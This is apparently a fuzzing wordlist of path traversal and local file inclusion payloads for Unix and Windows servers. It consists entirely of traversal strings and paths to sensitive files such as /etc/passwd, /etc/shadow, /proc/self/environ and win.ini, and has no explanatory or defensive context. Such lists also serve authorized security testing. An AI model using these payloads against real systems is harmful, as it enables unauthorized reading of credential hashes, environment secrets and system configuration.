../../../../etc/passwd
../../../etc/passwd
../../etc/passwd
../etc/passwd
../../../../etc/hosts
../../../etc/hosts
/etc/passwd
/etc/hosts
/etc/hostname
/etc/os-release
/etc/issue
/etc/shadow
/etc/group
/etc/crontab
/proc/self/environ
/proc/self/cmdline
/proc/version
../../../../windows/win.ini
../../../../windows/system.ini
../../../../windows/system32/drivers/etc/hosts
..\..\..\..\windows\win.ini
..\..\..\..\windows\system.ini
..\..\..\..\windows\system32\drivers\etc\hosts
../../../../boot.ini
..\..\..\..\boot.ini
